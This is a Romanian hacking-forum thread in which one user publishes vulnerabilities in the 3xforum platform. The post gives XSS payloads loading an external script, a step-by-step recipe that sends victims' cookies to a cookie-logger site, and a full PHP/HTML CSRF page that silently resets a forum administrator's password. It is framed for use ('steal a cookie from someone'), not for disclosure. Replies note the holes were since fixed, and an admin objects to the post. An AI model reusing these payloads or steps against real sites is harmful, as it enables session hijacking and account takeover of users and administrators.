EXTREMEZONE FORUM
WWW.EXTREMEZONE.3XFORUM.RO - WWW.TORENTZ.3XFORUM.RO- WWW.PETARDEARTIFICII.CABANOVA.COM http://www.facebook.com/petardeartificiidevanzare
Lista Forumurilor Pe Tematici
EXTREMEZONE FORUM | Reguli | Inregistrare | Login

POZE EXTREMEZONE FORUM

Nu sunteti logat.
Nou pe simpatie:
ElizaElizaiubi 23 ani
Femeie
23 ani
Satu Mare
cauta Barbat
23 - 53 ani
EXTREMEZONE FORUM / TRASH / .3xforums  
Autor
Mesaj Pagini: 1
LawAndOrder.
SPAMMER

Inregistrat: acum 16 ani
Postari: 10
#1) Prezentarea catorva vulnerabilitati
#2) Prezentarea unei metode de utilizare a acestora

#######
#Vuln 1#
#######

Un XSS foarte interesant prin faptul ca e persistent. Vulnerabilitatea apare la postarea unui mesaj si afecteaza toti utilizatorii. La postarea unui mesaj, se pune in titlu:

Code:
</title><SCRIPT SRC="http://ha.ckers.org/xss.js"></SCRIPT>


Efectul … javascript-ul este executat. Exemplu:

Code:


#######
#Vuln 2#
#######
Aceasta vulnerabilitate ii afecteaza doar pe administratori. Campul cu trimiterea unui SMS pentru inlaturarea reclamelor e si el vulnerabil. Introduceti:

Code:
"><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>


In http://***nume_forum***.3xforum.ro/admin_index.php . Efectul e din nou cel asteptat: codul nu e filtrate si javascript-ul este executat.

#######
#Vuln 3#
#######


O alta vulnerabilitate de tip XSS se regaseste in chat. Este un XSS non-persistent, dar, spre deosebire de primul XSS non-persistent, este pe baza de GET, asa ca e putin mai simplu de folosit. Vulnerabilitatea:

Code:
http://***nume_forum***.3xforum.ro/chat/?room="><script src=http://ha.ckers.org/xss.js ></script>


Acum, pentru a exploata aceasta vulnerabilitate,trebuie sa urmariti cativa pasi:

1. Daca nu aveti, faceti-va cont pe . Daca aveti, logati-va (in caz ca nu sunteti deja logat).
2. Intrati pe .
3. Dati un scroll pana jos, la legenda cu utilizatorii. Dati acolo click pe nick-ul vostru.
4. Copiati URL-ul. Va fi ceva de genul:
5. Pastrati doar caracterele numerice. In cazul meu, ramane doar:
193
6. Copiati sirul :
<script>document.location="http://rstzone.org/index.php?pagina=cookie_logger&user= ***&logheaza="+document.cookie;</script>
7. Inlocuiti asterix-urile cu numarul obtinut anterior. In cazul meu, am obtinut
<script>document.location="http://rstzone.org/index.php?pagina=cookie_logger&user= 193&logheaza="+document.cookie;</script>
8. Intrati aici si puneti in primul camp textul obtinut, dupa care copiati textul generat:
9. Inlocuiti, in acest script, ceea ce este notat cu ***nume_forum*** cu numele forumului, si ceea ce este notat cu ***script*** cu textul generat anterior:
http://***nume_forum***.3xforum.ro/chat/?room="><script>document.write(***script***)</script>
10. Salveaza link-ul si fura cookie de la cineva. Pentru a la vizualiza, tot ce trebuie sa faci este sa accesezi: ... izualizare
11. Ai terminat, nu uita sa imi multumesti :P.

#######
#Vuln 4#
#######

Din pacate (sau din fericire, pentru unii :P), asupra unui admin 3xforum pot fi tintuite si atacuri CSRF. De exemplu, din cauza ca nu se tine cont de refer ,unui admin ii poate fi schimbata parola fara macar sa isi dea seama.
La afisarea paginii, acest exploit schimba parola administratorului de pe forumul “xsst3st” in “parola”. Pentru a schimba parola unui alt site, trebuie doar sa inlocuiti, in a treia linie, valoarea variabilei $site. Daca vreti sa setati alta parola, trebuie sa schimbati, pe a cincia linie, valoarea variabilei $password. Valoarea $id, de pe a patra linie, va recomand sa o lasati neschimbata, pentru ca aproape toti administratorii forumurilor 3xforum au id-ul numeric 2.
Desigur, functioneaza doar daca cel care intra pe pagina este administratorul. Pentru a fi mai silentios, poate fi folosit prin iframe.

Code:

<?php

$site ="http://xsst3st.3xforum.ro";
$id="2"; //valoarea default este 2
$password = "parola"; //parola cu care ii va fi schimbata parola curenta

$site = $site . "/profile.php?action=change_pass&amp;id=";
$link = $site . $id;

$html = <<<HTML
<form method="post" action="http://xsst3st.3xforum.ro/profile.php?action=change_pass&amp;id=2" id="change_pass" name="tw8">
   <input type="hidden" name="form_sent" value="1">
   <table class="punmain" cellspacing="1" cellpadding="4">
      <tr class="punhead">
         <td class="punhead" colspan="2">Schimbare parola</td>
      </tr>
      <tr>
         <td class="puncon1right" style="width: 140px; white-space: nowrap"><b>Parola noua</b>&nbsp;&nbsp;</td>
         <td class="puncon2">
            &nbsp;<input type="password" name="req_new_password1" size="16" maxlength="16" value="$password"><br>
            &nbsp;<input type="password" name="req_new_password2" size="16" maxlength="16" value="$password">&nbsp;&nbsp;Introduceti parola inca o data         </td>
      </tr>
      <tr>
         <td class="puncon1right" style="width: 140px; white-space: nowrap">Actiuni&nbsp;&nbsp;</td>
         <td class="puncon2"><br>&nbsp;&nbsp;<input type="submit" name="update" value="Submit"><br><br></td>
      </tr>
   </table>
</form>

<script>
document.tw8.submit();
</script>

HTML;

echo $html;

?>



###########
#Observatie#
###########

Ceva nefolositor, dar care se merita amintit. Pentru admini, 3xforum are un sistem ce permite vizualizarea mesajelor in timp real. Faceti un utilizator intitulat “';alert(1);i='” (fara ghilimelele duble, dar cu ghilimelele simple) si postati un mesaj pe un forum pe care sunteti admin. Dupa putin timp, intrati pe http://**nume_forum**t.3xforum.ro/live2.php si uitati-va la sursa. Veti observa ceva de genul “\';alert(1);i=\'”. Daca ‘ nu ar fi inlocuit cu \’, ar fi un alt XSS persistent. Dupa cum am zis si mai sus, nefolositor, dar se merita amintit.


~Law ~tw8


_______________________________________
"Judge not, and you shall not be judged; Condemn not, and you shall not be condemned; Forgive, and you shall be forgiven." 637LukeDoc

pus acum 16 ani
   
Untouchable
MEMBRU

Din: San Venganza
Inregistrat: acum 16 ani
Postari: 111
mda e mai bine de o luna de cand vulnerabilitatile semnalate pe rstzone s-au rezolvat.am inteles ca mai sunt cateva,deocamdata p[rivate pentru publicul larg
oricum topicul e trash sau ma rog history de-acum


_______________________________________
r3st in peace...

pus acum 16 ani
   
SIGISMUNT
☻ADM!N☻

Din: WTF & SoB
Inregistrat: acum 16 ani
Postari: 5916
NU E BINE! FARA RECLAMA INUTILA MAI ALES VULNERABILITATI 3XFORUM! 

_______________________________________
PASSWORD ► REMEMBER TO SAY "THX" AND REPORT DEAD LINKS ►



pus acum 16 ani
   
Pagini: 1  

Mergi la